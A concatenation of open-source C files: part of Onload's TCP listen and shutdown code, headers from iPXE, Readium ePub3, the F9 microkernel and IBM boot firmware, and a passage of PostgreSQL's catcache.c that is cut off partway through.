CI_SOCK_FLAG_SCALPASSIVE) == 0 || NI_OPTS(netif).scalable_listen != CITP_SCALABLE_LISTEN_ACCELERATED_ONLY ) ci_tcp_helper_listen_os_sock(fd, ul_backlog); ci_netif_unlock(ep->netif); return 0; } if( s->b.state != CI_TCP_CLOSED ) { CI_SET_ERROR(rc, EINVAL); return rc; } ts = SOCK_TO_TCP(s); /* Bug 3376: if socket used for a previous, failed, connect then the error * numbers will not be as expected. Only seen when not using listening * netifs (as moving the EP to the new netif resets them). 
*/ ts->s.tx_errno = EPIPE; ts->s.rx_errno = ENOTCONN; ci_sock_lock(netif, &ts->s.b); ci_netif_lock(ep->netif); /* fill in address/ports and all TCP state */ if( ts->s.s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND ) { ci_uint16 source_be16; /* They haven't previously done a bind, so we need to choose * a port. As we haven't been given a hint we let the OS choose. * * NB The previously-calculated will_accelerate variable remains valid, * because this call __ci_tcp_bind() never results in * CI_SOCK_FLAG_BOUND_ALIEN flag being set. */ source_be16 = 0; rc = __ci_tcp_bind(ep->netif, ep->s, fd, ts->s.laddr, &source_be16, 0); if (CI_LIKELY( rc==0 )) { TS_IPX_TCP(ts)->tcp_source_be16 = source_be16; ts->s.cp.lport_be16 = source_be16; LOG_TC(log(LNT_FMT "listen: our bind returned "IPX_FMT":%u", LNT_PRI_ARGS(ep->netif, ts), IPX_ARG(AF_IP(ts->s.laddr)), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_source_be16))); } else { LOG_U(ci_log("__ci_tcp_bind returned %d at %s:%d", CI_GET_ERROR(rc), __FILE__, __LINE__)); ci_netif_unlock(ep->netif); ci_sock_unlock(netif, &ts->s.b); return rc; } } ci_tcp_set_slow_state(netif, ts, CI_TCP_LISTEN); tls = SOCK_TO_TCP_LISTEN(&ts->s); ipx_hdr_set_daddr(ipcache_af(&tls->s.pkt), &tls->s.pkt.ipx, addr_any); tcp_rport_be16(tls) = 0u; ci_assert_equal(tls->s.tx_errno, EPIPE); ci_assert_equal(tls->s.rx_errno, ENOTCONN); /* Listen timer should be initialized before the first return statement, * because __ci_tcp_listen_to_normal() will be called on error path. 
*/ rc = ci_tcp_listen_init(netif, tls); /* Drop the socket lock */ ci_netif_unlock(ep->netif); ci_sock_unlock(netif, &ts->s.b); ci_netif_lock(ep->netif); if( rc != 0 ) { CI_SET_ERROR(rc, -rc); goto listen_fail; } tls->acceptq_max = ul_backlog; CITP_STATS_TCP_LISTEN(CI_ZERO(&tls->stats)); /* install all the filters needed for this connection * - tcp_laddr_be32(ts) = 0 for IPADDR_ANY * * TODO: handle BINDTODEVICE by setting phys_port paramter to correct * physical L5 port index * TODO: handle REUSEADDR by setting last paramter to TRUE */ if( will_accelerate ) { #ifdef ONLOAD_OFE if( netif->ofe_channel != NULL ) { tls->s.ofe_code_start = ofe_socktbl_find( netif->ofe, OFE_SOCKTYPE_TCP_LISTEN, tcp_laddr_be32(tls), INADDR_ANY, tcp_lport_be16(ts), 0); tls->ofe_promote = ofe_socktbl_find( netif->ofe, OFE_SOCKTYPE_TCP_PASSIVE, tcp_laddr_be32(tls), INADDR_ANY, tcp_lport_be16(ts), 0); } else { tls->s.ofe_code_start = OFE_ADDR_NULL; tls->ofe_promote = OFE_ADDR_NULL; } #endif if( scalable ) tls->s.s_flags |= CI_SOCK_FLAG_SCALPASSIVE; rc = ci_tcp_ep_set_filters(netif, S_SP(tls), tls->s.cp.so_bindtodevice, OO_SP_NULL); if( rc == -EFILTERSSOME ) { if( CITP_OPTS.no_fail ) rc = 0; else { ci_tcp_ep_clear_filters(netif, S_SP(tls), 0); rc = -ENOBUFS; } } ci_assert_nequal(rc, -EFILTERSSOME); VERB(ci_log("%s: set_filters returned %d", __FUNCTION__, rc)); if (rc < 0) { if( s->s_flags & CI_SOCK_FLAG_BOUND_ALIEN && NI_OPTS(netif).tcp_server_loopback ) { /* That alien address can't be served by filters despite * CI_NETIF_FLAG_USE_ALIEN_LADDRS. We'll accelerate loopback in * any case. */ rc = 0; } else { CI_SET_ERROR(rc, -rc); goto post_listen_fail; } } } ci_assert_equal(rc, 0); /* * Call of system listen() is required for listen any, local host * communications server and multi-homed server (to accept connections * to L5 assigned address(es), but incoming from other interfaces). 
* The exception is scalable passive mode where we avoid listen on * OS socket to avoid kernel LHTABLE related performance degradation. */ if( (s->s_flags & CI_SOCK_FLAG_SCALPASSIVE) == 0 || NI_OPTS(netif).scalable_listen != CITP_SCALABLE_LISTEN_ACCELERATED_ONLY ) { #ifdef __ci_driver__ rc = efab_tcp_helper_listen_os_sock( netif2tcp_helper_resource(netif), S_SP(tls), backlog); #else rc = ci_tcp_helper_listen_os_sock(fd, backlog); #endif } if ( rc < 0 ) { /* clear the filter we've just set */ ci_tcp_ep_clear_filters(netif, S_SP(tls), 0); goto post_listen_fail; } ci_netif_unlock(ep->netif); return 0; post_listen_fail: ci_tcp_listenq_drop_all(netif, tls); listen_fail: /* revert TCP state to a non-listening socket format */ __ci_tcp_listen_to_normal(netif, tls); /* Above function sets orphan flag but we are attached to an FD. */ ci_bit_clear(&tls->s.b.sb_aflags, CI_SB_AFLAG_ORPHAN_BIT); ci_netif_unlock(ep->netif); #ifdef __ci_driver__ return rc; #else return CI_SOCKET_ERROR; #endif } static int ci_tcp_shutdown_listen(citp_socket* ep, int how, ci_fd_t fd) { ci_tcp_socket_listen* tls = SOCK_TO_TCP_LISTEN(ep->s); if( how == SHUT_WR ) return 0; ci_sock_lock(ep->netif, &tls->s.b); ci_netif_lock(ep->netif); LOG_TC(ci_log(SK_FMT" shutdown(SHUT_RD)", SK_PRI_ARGS(ep))); __ci_tcp_listen_shutdown(ep->netif, tls, fd); __ci_tcp_listen_to_normal(ep->netif, tls); { ci_fd_t os_sock = ci_get_os_sock_fd(fd); int flags = ci_sys_fcntl(os_sock, F_GETFL); flags &= (~O_NONBLOCK); CI_TRY(ci_sys_fcntl(os_sock, F_SETFL, flags)); ci_rel_os_sock_fd(os_sock); } citp_waitable_wake_not_in_poll(ep->netif, &tls->s.b, CI_SB_FLAG_WAKE_RX | CI_SB_FLAG_WAKE_TX); ci_netif_unlock(ep->netif); ci_sock_unlock(ep->netif, &tls->s.b); return 0; } int ci_tcp_shutdown(citp_socket* ep, int how, ci_fd_t fd) { ci_sock_cmn* s = ep->s; int rc; if( s->b.state == CI_TCP_LISTEN ) return ci_tcp_shutdown_listen(ep, how, fd); if( SOCK_TO_TCP(s)->snd_delegated ) { /* We do not know which seq number to use. 
Call * onload_delegated_send_cancel(). */ CI_SET_ERROR(rc, EBUSY); return rc; } if( ! ci_netif_trylock(ep->netif) ) { /* Can't get lock, so try to defer shutdown to the lock holder. */ unsigned flags = 0; switch( s->b.state ) { case CI_TCP_CLOSED: case CI_TCP_TIME_WAIT: CI_SET_ERROR(rc, ENOTCONN); return rc; } if( how == SHUT_RD || how == SHUT_RDWR ) flags |= CI_SOCK_AFLAG_NEED_SHUT_RD; if( how == SHUT_WR || how == SHUT_RDWR ) flags |= CI_SOCK_AFLAG_NEED_SHUT_WR; ci_atomic32_or(&s->s_aflags, flags); if( ci_netif_lock_or_defer_work(ep->netif, &s->b) ) ci_netif_unlock(ep->netif); return 0; } rc = __ci_tcp_shutdown(ep->netif, SOCK_TO_TCP(s), how); ci_netif_unlock(ep->netif); if( rc < 0 ) CI_SET_ERROR(rc, -rc); return rc; } void ci_tcp_get_peer_addr(ci_tcp_state* ts, struct sockaddr* name, socklen_t* namelen) { int af = ipcache_af(&ts->s.pkt); int /*bool*/ dnat = ts->s.s_flags & CI_SOCK_FLAG_DNAT; ci_addr_t raddr = dnat ? ts->pre_nat.daddr_be32 : tcp_ipx_raddr(ts); ci_uint16 port = dnat ? ts->pre_nat.dport_be16 : TS_IPX_TCP(ts)->tcp_dest_be16; ci_addr_to_user(name, namelen, af, ts->s.domain, port, CI_IPX_ADDR_PTR(af, raddr), ts->s.cp.so_bindtodevice); } int ci_tcp_getpeername(citp_socket* ep, struct sockaddr* name, socklen_t* namelen) { ci_sock_cmn* s = ep->s; int rc; CHECK_TEP_NNL(ep); /* If we're not connected... */ if( ! (s->b.state & CI_TCP_STATE_SYNCHRONISED) || s->b.state == CI_TCP_TIME_WAIT ) CI_SET_ERROR(rc, ENOTCONN); else if( name == NULL || namelen == NULL ) CI_SET_ERROR(rc, EFAULT); else { rc = 0; if( s->b.state != CI_TCP_LISTEN ) ci_tcp_get_peer_addr(SOCK_TO_TCP(s), name, namelen); } return rc; } int ci_tcp_getsockname(citp_socket* ep, ci_fd_t fd, struct sockaddr* sa, socklen_t* p_sa_len) { ci_sock_cmn* s = ep->s; int rc = 0; /* Check consistency of multitude of bind flags */ ci_tcp_bind_flags_assert_valid(s); if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ) complete_deferred_bind(ep->netif, s, fd); return rc; } #endif
{ "language": "C" }
#ifndef _IPXE_RETRY_H #define _IPXE_RETRY_H /** @file * * Retry timers * */ FILE_LICENCE ( GPL2_OR_LATER ); #include <ipxe/list.h> /** Default timeout value */ #define DEFAULT_MIN_TIMEOUT ( TICKS_PER_SEC / 4 ) /** Limit after which the timeout will be deemed permanent */ #define DEFAULT_MAX_TIMEOUT ( 10 * TICKS_PER_SEC ) /** A retry timer */ struct retry_timer { /** List of active timers */ struct list_head list; /** Timer is currently running */ unsigned int running; /** Timeout value (in ticks) */ unsigned long timeout; /** Minimum timeout value (in ticks) * * A value of zero means "use default timeout." */ unsigned long min_timeout; /** Maximum timeout value before failure (in ticks) * * A value of zero means "use default timeout." */ unsigned long max_timeout; /** Start time (in ticks) */ unsigned long start; /** Retry count */ unsigned int count; /** Timer expired callback * * @v timer Retry timer * @v fail Failure indicator * * The timer will already be stopped when this method is * called. The failure indicator will be True if the retry * timeout has already exceeded @c MAX_TIMEOUT. */ void ( * expired ) ( struct retry_timer *timer, int over ); /** Reference counter * * If this interface is not part of a reference-counted * object, this field may be NULL. 
*/ struct refcnt *refcnt; }; /** * Initialise a timer * * @v timer Retry timer * @v expired Timer expired callback * @v refcnt Reference counter, or NULL */ static inline __attribute__ (( always_inline )) void timer_init ( struct retry_timer *timer, void ( * expired ) ( struct retry_timer *timer, int over ), struct refcnt *refcnt ) { timer->expired = expired; timer->refcnt = refcnt; } /** * Initialise a static timer * * @v expired_fn Timer expired callback */ #define TIMER_INIT( expired_fn ) { \ .expired = (expired_fn), \ } extern void start_timer ( struct retry_timer *timer ); extern void start_timer_fixed ( struct retry_timer *timer, unsigned long timeout ); extern void stop_timer ( struct retry_timer *timer ); extern void retry_poll ( void ); /** * Start timer with no delay * * @v timer Retry timer * * This starts the timer running with a zero timeout value. */ static inline void start_timer_nodelay ( struct retry_timer *timer ) { start_timer_fixed ( timer, 0 ); } /** * Test to see if timer is currently running * * @v timer Retry timer * @ret running Non-zero if timer is running */ static inline __attribute__ (( always_inline )) unsigned long timer_running ( struct retry_timer *timer ) { return ( timer->running ); } #endif /* _IPXE_RETRY_H */
{ "language": "C" }
// // initialization.h // ePub3 // // Created by Bluefire MBP2 on 7/31/13. // Copyright (c) 2014 Readium Foundation and/or its licensees. All rights reserved. // // Redistribution and use in source and binary forms, with or without modification, // are permitted provided that the following conditions are met: // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation and/or // other materials provided with the distribution. // 3. Neither the name of the organization nor the names of its contributors may be // used to endorse or promote products derived from this software without specific // prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND // ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED // WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. // IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, // BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE // OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. #ifndef ePub3_initialization_h #define ePub3_initialization_h #include <ePub3/epub3.h> EPUB3_BEGIN_NAMESPACE void InitializeSdk(); void PopulateFilterManager(); EPUB3_END_NAMESPACE #endif
{ "language": "C" }
/* Copyright (c) 2013 The F9 Microkernel Project. All rights reserved. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #ifndef LIB_KTABLE_H_ #define LIB_KTABLE_H_ #include <platform/armv7m.h> #include <platform/link.h> #include <lib/bitmap.h> #include <types.h> struct ktable { char *tname; bitmap_ptr_t bitmap; ptr_t data; size_t num; size_t size; }; typedef struct ktable ktable_t; #define DECLARE_KTABLE(type, name, num_) \ DECLARE_BITMAP(kt_ ## name ## _bitmap, num_); \ static __KTABLE type kt_ ## name ## _data[num_]; \ ktable_t name = { \ .tname = #name, \ .bitmap = kt_ ## name ## _bitmap, \ .data = (ptr_t) kt_ ## name ## _data, \ .num = num_, .size = sizeof(type) \ } void ktable_init(ktable_t *kt); int ktable_is_allocated(ktable_t *kt, int i); void *ktable_alloc_id(ktable_t *kt, int i); void *ktable_alloc(ktable_t *kt); void ktable_free(ktable_t *kt, void *element); uint32_t ktable_getid(ktable_t *kt, void *element); /* * For each ALLOCATED element in ktable * Should be used as: * * type *el; * int idx; * * for_each_in_ktable(el, idx, my_ktable) { * ... * } * */ #define for_each_in_ktable(el, idx, kt) \ for (el = (typeof(el)) (kt)->data, idx = 0; idx < (kt)->num; ++idx, ++el) \ if (bitmap_get_bit(bitmap_cursor((kt)->bitmap, idx)) == 1) #endif /* LIB_KTABLE_H_ */
{ "language": "C" }
/****************************************************************************** * Copyright (c) 2004, 2008 IBM Corporation * All rights reserved. * This program and the accompanying materials * are made available under the terms of the BSD License * which accompanies this distribution, and is available at * http://www.opensource.org/licenses/bsd-license.php * * Contributors: * IBM Corporation - initial implementation *****************************************************************************/ #ifndef BOOT_ABORT_H #define BOOT_ABORT_H /* boot abort function suitable for assembly */ #define BOOT_ABORT(cap, action, msg, numhint) \ li r3, cap; \ li r4, action; \ LOAD32(r5, msg); \ LOAD32(r6, numhint); \ bl boot_abort /* boot abort function suitable called from c (takes r3 as hint) */ #define BOOT_ABORT_R3HINT(cap, action, msg) \ mr r6, r3; \ li r3, cap; \ li r4, action; \ LOAD32(r5, msg); \ bl boot_abort #define ABORT_CANIO (1 << 0) #define ABORT_NOIO (1 << 1) #define ALTBOOT (1 << 0) #define HALT (1 << 1) #endif
{ "language": "C" }
/*------------------------------------------------------------------------- * * catcache.c * System catalog cache for tuples matching a key. * * Portions Copyright (c) 1996-2013, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * * IDENTIFICATION * src/backend/utils/cache/catcache.c * *------------------------------------------------------------------------- */ #include "postgres.h" #include "access/genam.h" #include "access/hash.h" #include "access/heapam.h" #include "access/relscan.h" #include "access/sysattr.h" #include "access/tuptoaster.h" #include "access/valid.h" #include "catalog/pg_operator.h" #include "catalog/pg_type.h" #include "miscadmin.h" #ifdef CATCACHE_STATS #include "storage/ipc.h" /* for on_proc_exit */ #endif #include "storage/lmgr.h" #include "utils/builtins.h" #include "utils/fmgroids.h" #include "utils/inval.h" #include "utils/memutils.h" #include "utils/rel.h" #include "utils/resowner_private.h" #include "utils/syscache.h" #include "utils/tqual.h" /* #define CACHEDEBUG */ /* turns DEBUG elogs on */ /* * Given a hash value and the size of the hash table, find the bucket * in which the hash value belongs. Since the hash table must contain * a power-of-2 number of elements, this is a simple bitmask. 
*/ #define HASH_INDEX(h, sz) ((Index) ((h) & ((sz) - 1))) /* * variables, macros and other stuff */ #ifdef CACHEDEBUG #define CACHE1_elog(a,b) elog(a,b) #define CACHE2_elog(a,b,c) elog(a,b,c) #define CACHE3_elog(a,b,c,d) elog(a,b,c,d) #define CACHE4_elog(a,b,c,d,e) elog(a,b,c,d,e) #define CACHE5_elog(a,b,c,d,e,f) elog(a,b,c,d,e,f) #define CACHE6_elog(a,b,c,d,e,f,g) elog(a,b,c,d,e,f,g) #else #define CACHE1_elog(a,b) #define CACHE2_elog(a,b,c) #define CACHE3_elog(a,b,c,d) #define CACHE4_elog(a,b,c,d,e) #define CACHE5_elog(a,b,c,d,e,f) #define CACHE6_elog(a,b,c,d,e,f,g) #endif /* Cache management header --- pointer is NULL until created */ static CatCacheHeader *CacheHdr = NULL; static uint32 CatalogCacheComputeHashValue(CatCache *cache, int nkeys, ScanKey cur_skey); static uint32 CatalogCacheComputeTupleHashValue(CatCache *cache, HeapTuple tuple); #ifdef CATCACHE_STATS static void CatCachePrintStats(int code, Datum arg); #endif static void CatCacheRemoveCTup(CatCache *cache, CatCTup *ct); static void CatCacheRemoveCList(CatCache *cache, CatCList *cl); static void CatalogCacheInitializeCache(CatCache *cache); static CatCTup *CatalogCacheCreateEntry(CatCache *cache, HeapTuple ntp, uint32 hashValue, Index hashIndex, bool negative); static HeapTuple build_dummy_tuple(CatCache *cache, int nkeys, ScanKey skeys); /* * internal support functions */ /* * Look up the hash and equality functions for system types that are used * as cache key fields. * * XXX this should be replaced by catalog lookups, * but that seems to pose considerable risk of circularity... 
 */
static void
GetCCHashEqFuncs(Oid keytype, PGFunction *hashfunc, RegProcedure *eqfunc)
{
	switch (keytype)
	{
		case BOOLOID:
			*hashfunc = hashchar;
			*eqfunc = F_BOOLEQ;
			break;
		case CHAROID:
			*hashfunc = hashchar;
			*eqfunc = F_CHAREQ;
			break;
		case NAMEOID:
			*hashfunc = hashname;
			*eqfunc = F_NAMEEQ;
			break;
		case INT2OID:
			*hashfunc = hashint2;
			*eqfunc = F_INT2EQ;
			break;
		case INT2VECTOROID:
			*hashfunc = hashint2vector;
			*eqfunc = F_INT2VECTOREQ;
			break;
		case INT4OID:
			*hashfunc = hashint4;
			*eqfunc = F_INT4EQ;
			break;
		case TEXTOID:
			*hashfunc = hashtext;
			*eqfunc = F_TEXTEQ;
			break;

			/*
			 * All the OID-alias types hash and compare exactly like plain
			 * OID, so they share one set of support functions.
			 */
		case OIDOID:
		case REGPROCOID:
		case REGPROCEDUREOID:
		case REGOPEROID:
		case REGOPERATOROID:
		case REGCLASSOID:
		case REGTYPEOID:
		case REGCONFIGOID:
		case REGDICTIONARYOID:
			*hashfunc = hashoid;
			*eqfunc = F_OIDEQ;
			break;
		case OIDVECTOROID:
			*hashfunc = hashoidvector;
			*eqfunc = F_OIDVECTOREQ;
			break;
		default:
			elog(FATAL, "type %u not supported as catcache key", keytype);
			*hashfunc = NULL;	/* keep compiler quiet */
			*eqfunc = InvalidOid;
			break;
	}
}

/*
 *		CatalogCacheComputeHashValue
 *
 * Compute the hash value associated with a given set of lookup keys
 */
static uint32
CatalogCacheComputeHashValue(CatCache *cache, int nkeys, ScanKey cur_skey)
{
	uint32		hashValue = 0;
	uint32		oneHash;

	CACHE4_elog(DEBUG2, "CatalogCacheComputeHashValue %s %d %p",
				cache->cc_relname,
				nkeys,
				cache);

	/*
	 * The switch falls through from the highest key number down to key 1,
	 * so an N-key lookup mixes in exactly the first N key hashes.  Each
	 * key's hash is rotated into a different bit position (by 24, 16, 8,
	 * and 0 bits respectively) before being XOR'd in, so equal values
	 * appearing in different key columns yield different combined hashes.
	 */
	switch (nkeys)
	{
		case 4:
			oneHash =
				DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[3],
												   cur_skey[3].sk_argument));
			hashValue ^= oneHash << 24;
			hashValue ^= oneHash >> 8;
			/* FALLTHROUGH */
		case 3:
			oneHash =
				DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[2],
												   cur_skey[2].sk_argument));
			hashValue ^= oneHash << 16;
			hashValue ^= oneHash >> 16;
			/* FALLTHROUGH */
		case 2:
			oneHash =
				DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[1],
												   cur_skey[1].sk_argument));
			hashValue ^= oneHash << 8;
			hashValue ^= oneHash >> 24;
			/* FALLTHROUGH */
		case 1:
			oneHash =
				DatumGetUInt32(DirectFunctionCall1(cache->cc_hashfunc[0],
												   cur_skey[0].sk_argument));
			hashValue ^= oneHash;
			break;
		default:
			elog(FATAL, "wrong number of hash keys: %d", nkeys);
			break;
	}

	return hashValue;
}

/*
 *		CatalogCacheComputeTupleHashValue
 *
 * Compute the hash value associated with a given tuple to be cached
 */
static uint32
CatalogCacheComputeTupleHashValue(CatCache *cache, HeapTuple tuple)
{
	ScanKeyData cur_skey[CATCACHE_MAXKEYS];
	bool		isNull = false;

	/* Copy pre-initialized overhead data for scankey */
	memcpy(cur_skey, cache->cc_skey, sizeof(cur_skey));

	/*
	 * Now extract key fields from tuple, insert into scankey.  A key column
	 * of ObjectIdAttributeNumber means "use the tuple's OID"; any other key
	 * is a regular user attribute fetched with fastgetattr.  The same isNull
	 * flag is reused for each fetch; cache key columns must never be NULL,
	 * which each Assert checks immediately after the corresponding fetch.
	 */
	switch (cache->cc_nkeys)
	{
		case 4:
			cur_skey[3].sk_argument =
				(cache->cc_key[3] == ObjectIdAttributeNumber)
				? ObjectIdGetDatum(HeapTupleGetOid(tuple))
				: fastgetattr(tuple,
							  cache->cc_key[3],
							  cache->cc_tupdesc,
							  &isNull);
			Assert(!isNull);
			/* FALLTHROUGH */
		case 3:
			cur_skey[2].sk_argument =
				(cache->cc_key[2] == ObjectIdAttributeNumber)
				? ObjectIdGetDatum(HeapTupleGetOid(tuple))
				: fastgetattr(tuple,
							  cache->cc_key[2],
							  cache->cc_tupdesc,
							  &isNull);
			Assert(!isNull);
			/* FALLTHROUGH */
		case 2:
			cur_skey[1].sk_argument =
				(cache->cc_key[1] == ObjectIdAttributeNumber)
				? ObjectIdGetDatum(HeapTupleGetOid(tuple))
				: fastgetattr(tuple,
							  cache->cc_key[1],
							  cache->cc_tupdesc,
							  &isNull);
			Assert(!isNull);
			/* FALLTHROUGH */
		case 1:
			cur_skey[0].sk_argument =
				(cache->cc_key[0] == ObjectIdAttributeNumber)
				? ObjectIdGetDatum(HeapTupleGetOid(tuple))
				: fastgetattr(tuple,
							  cache->cc_key[0],
							  cache->cc_tupdesc,
							  &isNull);
			Assert(!isNull);
			break;
		default:
			elog(FATAL, "wrong number of hash keys: %d", cache->cc_nkeys);
			break;
	}

	return CatalogCacheComputeHashValue(cache, cache->cc_nkeys, cur_skey);
}

#ifdef CATCACHE_STATS

/*
 * Print usage statistics for all catcaches.  Installed as an on_proc_exit
 * callback (see InitCatCache), so this runs once at backend shutdown.
 * Caches that were never searched and hold no tuples are skipped.
 */
static void
CatCachePrintStats(int code, Datum arg)
{
	slist_iter	iter;
	long		cc_searches = 0;
	long		cc_hits = 0;
	long		cc_neg_hits = 0;
	long		cc_newloads = 0;
	long		cc_invals = 0;
	long		cc_lsearches = 0;
	long		cc_lhits = 0;

	slist_foreach(iter, &CacheHdr->ch_caches)
	{
		CatCache   *cache = slist_container(CatCache, cc_next, iter.cur);

		if (cache->cc_ntup == 0 && cache->cc_searches == 0)
			continue;			/* don't print unused caches */
		elog(DEBUG2, "catcache %s/%u: %d tup, %ld srch, %ld+%ld=%ld hits, %ld+%ld=%ld loads, %ld invals, %ld lsrch, %ld lhits",
			 cache->cc_relname,
			 cache->cc_indexoid,
			 cache->cc_ntup,
			 cache->cc_searches,
			 cache->cc_hits,
			 cache->cc_neg_hits,
			 cache->cc_hits + cache->cc_neg_hits,
			 cache->cc_newloads,
			 cache->cc_searches - cache->cc_hits - cache->cc_neg_hits - cache->cc_newloads,
			 cache->cc_searches - cache->cc_hits - cache->cc_neg_hits,
			 cache->cc_invals,
			 cache->cc_lsearches,
			 cache->cc_lhits);
		cc_searches += cache->cc_searches;
		cc_hits += cache->cc_hits;
		cc_neg_hits += cache->cc_neg_hits;
		cc_newloads += cache->cc_newloads;
		cc_invals += cache->cc_invals;
		cc_lsearches += cache->cc_lsearches;
		cc_lhits += cache->cc_lhits;
	}
	elog(DEBUG2, "catcache totals: %d tup, %ld srch, %ld+%ld=%ld hits, %ld+%ld=%ld loads, %ld invals, %ld lsrch, %ld lhits",
		 CacheHdr->ch_ntup,
		 cc_searches,
		 cc_hits,
		 cc_neg_hits,
		 cc_hits + cc_neg_hits,
		 cc_newloads,
		 cc_searches - cc_hits - cc_neg_hits - cc_newloads,
		 cc_searches - cc_hits - cc_neg_hits,
		 cc_invals,
		 cc_lsearches,
		 cc_lhits);
}
#endif   /* CATCACHE_STATS */


/*
 *		CatCacheRemoveCTup
 *
 *		Unlink and delete the given cache entry
 *
 *		NB: if it is a member of a CatCList, the CatCList is deleted too.
 *		Both the cache entry and the list had better have zero refcount.
 */
static void
CatCacheRemoveCTup(CatCache *cache, CatCTup *ct)
{
	Assert(ct->refcount == 0);
	Assert(ct->my_cache == cache);

	if (ct->c_list)
	{
		/*
		 * The cleanest way to handle this is to call CatCacheRemoveCList,
		 * which will recurse back to me, and the recursive call will do the
		 * work.  Set the "dead" flag to make sure it does recurse.
		 */
		ct->dead = true;
		CatCacheRemoveCList(cache, ct->c_list);
		return;					/* nothing left to do */
	}

	/* delink from linked list */
	dlist_delete(&ct->cache_elem);

	/* free associated tuple data */
	if (ct->tuple.t_data != NULL)
		pfree(ct->tuple.t_data);
	pfree(ct);

	/* keep both the per-cache and the global tuple counters in sync */
	--cache->cc_ntup;
	--CacheHdr->ch_ntup;
}

/*
 *		CatCacheRemoveCList
 *
 *		Unlink and delete the given cache list entry
 *
 *		NB: any dead member entries that become unreferenced are deleted too.
 */
static void
CatCacheRemoveCList(CatCache *cache, CatCList *cl)
{
	int			i;

	Assert(cl->refcount == 0);
	Assert(cl->my_cache == cache);

	/* delink from member tuples */
	for (i = cl->n_members; --i >= 0;)
	{
		CatCTup    *ct = cl->members[i];

		Assert(ct->c_list == cl);
		ct->c_list = NULL;
		/* if the member is dead and now has no references, remove it */
		if (
#ifndef CATCACHE_FORCE_RELEASE
			ct->dead &&
#endif
			ct->refcount == 0)
			CatCacheRemoveCTup(cache, ct);
	}

	/* delink from linked list */
	dlist_delete(&cl->cache_elem);

	/* free associated tuple data */
	if (cl->tuple.t_data != NULL)
		pfree(cl->tuple.t_data);
	pfree(cl);
}


/*
 *	CatalogCacheIdInvalidate
 *
 *	Invalidate entries in the specified cache, given a hash value.
 *
 *	We delete cache entries that match the hash value, whether positive
 *	or negative.  We don't care whether the invalidation is the result
 *	of a tuple insertion or a deletion.
 *
 *	We used to try to match positive cache entries by TID, but that is
 *	unsafe after a VACUUM FULL on a system catalog: an inval event could
 *	be queued before VACUUM FULL, and then processed afterwards, when the
 *	target tuple that has to be invalidated has a different TID than it
 *	did when the event was created.  So now we just compare hash values and
 *	accept the small risk of unnecessary invalidations due to false matches.
 *
 *	This routine is only quasi-public: it should only be used by inval.c.
 */
void
CatalogCacheIdInvalidate(int cacheId, uint32 hashValue)
{
	slist_iter	cache_iter;

	CACHE1_elog(DEBUG2, "CatalogCacheIdInvalidate: called");

	/*
	 * inspect caches to find the proper cache
	 */
	slist_foreach(cache_iter, &CacheHdr->ch_caches)
	{
		CatCache   *ccp = slist_container(CatCache, cc_next, cache_iter.cur);
		Index		hashIndex;
		dlist_mutable_iter iter;

		if (cacheId != ccp->id)
			continue;

		/*
		 * We don't bother to check whether the cache has finished
		 * initialization yet; if not, there will be no entries in it so no
		 * problem.
		 */

		/*
		 * Invalidate *all* CatCLists in this cache; it's too hard to tell
		 * which searches might still be correct, so just zap 'em all.
		 *
		 * Referenced entries can't be freed out from under their users, so
		 * they are only marked dead; the actual removal happens later when
		 * the last reference is released (see ReleaseCatCacheList).
		 */
		dlist_foreach_modify(iter, &ccp->cc_lists)
		{
			CatCList   *cl = dlist_container(CatCList, cache_elem, iter.cur);

			if (cl->refcount > 0)
				cl->dead = true;
			else
				CatCacheRemoveCList(ccp, cl);
		}

		/*
		 * inspect the proper hash bucket for tuple matches
		 */
		hashIndex = HASH_INDEX(hashValue, ccp->cc_nbuckets);

		dlist_foreach_modify(iter, &ccp->cc_bucket[hashIndex])
		{
			CatCTup    *ct = dlist_container(CatCTup, cache_elem, iter.cur);

			if (hashValue == ct->hash_value)
			{
				if (ct->refcount > 0 ||
					(ct->c_list && ct->c_list->refcount > 0))
				{
					ct->dead = true;
					/* list, if any, was marked dead above */
					Assert(ct->c_list == NULL || ct->c_list->dead);
				}
				else
					CatCacheRemoveCTup(ccp, ct);
				CACHE1_elog(DEBUG2, "CatalogCacheIdInvalidate: invalidated");
#ifdef CATCACHE_STATS
				ccp->cc_invals++;
#endif
				/* could be multiple matches, so keep looking! */
			}
		}
		break;					/* need only search this one cache */
	}
}

/* ----------------------------------------------------------------
 *					   public functions
 * ----------------------------------------------------------------
 */


/*
 * Standard routine for creating cache context if it doesn't exist yet
 *
 * There are a lot of places (probably far more than necessary) that check
 * whether CacheMemoryContext exists yet and want to create it if not.
 * We centralize knowledge of exactly how to create it here.
 */
void
CreateCacheMemoryContext(void)
{
	/*
	 * Purely for paranoia, check that context doesn't exist; caller probably
	 * did so already.
	 */
	if (!CacheMemoryContext)
		CacheMemoryContext = AllocSetContextCreate(TopMemoryContext,
												   "CacheMemoryContext",
												   ALLOCSET_DEFAULT_MINSIZE,
												   ALLOCSET_DEFAULT_INITSIZE,
